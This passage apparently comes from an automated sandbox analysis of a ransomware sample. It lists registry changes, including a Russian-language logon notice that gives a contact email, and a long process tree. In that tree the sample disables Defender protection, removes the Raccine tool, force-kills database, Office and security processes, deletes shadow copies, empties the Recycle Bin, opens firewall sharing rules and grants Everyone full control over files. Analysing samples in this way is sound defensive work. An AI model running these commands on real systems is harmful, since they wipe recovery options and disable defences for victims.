PID 2256 wrote to memory of 1568	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	Conhost.exe
PID 2256 wrote to memory of 3016	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Внимание Внимание Внимание!\r\n\r\nДобрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

C:\Users\Admin\AppData\Local\Temp\34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
"C:\Users\Admin\AppData\Local\Temp\34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe"
1⤵
- Windows security modification
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2256
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:968
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2676
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2084
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1396
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:412
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:2700
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:2032
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1768
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:4080
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:3752
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1308
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:3960
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:2000
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:3776
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:2932
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:932
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2424
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:188
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:3152
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3768
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:1568
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3016
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2668
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1996
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3628
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:4056
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2368
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2108
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2496
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3024
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1476
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2180
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3124
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2012
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3348
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3968
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:188
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3776
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3788
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:196
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  PID:2736
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2632
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:384
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:804
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3940
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3140
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  PID:3984
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4056
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3960
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:2760
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:392
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1172
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  PID:1168
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2676
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:932
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1396
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2904
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4080
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3432
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  PID:2728
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:992
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2620
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:2692
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3220
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1288
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4020
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1508
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3300
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1568
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3152
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3428
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2736
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1168
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3984
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2728
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:744
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2692
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3436
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM vmwp.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:576
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3604
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:4052
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:3772
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1508
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:2676
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\GetConnect.ps1 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3408
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3432
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log.html /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:956
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1288
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:200
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3400
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3152
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_000_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2084
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_001_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2904
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2676
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3636
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:4016
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2300
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3136
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3052
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3456
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3124
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2012
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:192
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3728
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1844
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2100
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:4052
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Oracle\Java\java.settings.cfg /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2368
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:392
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-065959-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3940
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070122-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2732
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070349-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3960
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070541-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:768
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Live\WLive48x48.png /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1732
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-04102021-065958.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1308
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-04102021-065958.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2728
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MpWppTracing-04102021-065958-00000003-ffffffff.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3220
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2208
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin.80 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:196
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin.83 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:192
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin.A0 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3728
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\MpDiag.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3996
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\22\109003 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3812
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\21\260 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:200
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\272 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3628
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\328 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2368
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2704
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:404
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\109002 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2424
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\109001 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3148
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\193 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:740
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\15\262 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2728
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\11\200 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3456
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\05\191 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3616
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\198 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:4000
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\271 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:192
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\00\192 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3152
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Network Inspection System\Support\NisLog.txt /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3432
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppxProvisioning.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:748
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java Development Kit\Reference Documentation.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3656
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Get Help.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2684
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.url /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3028
- C:\Windows\SysWOW64\icacls.exe
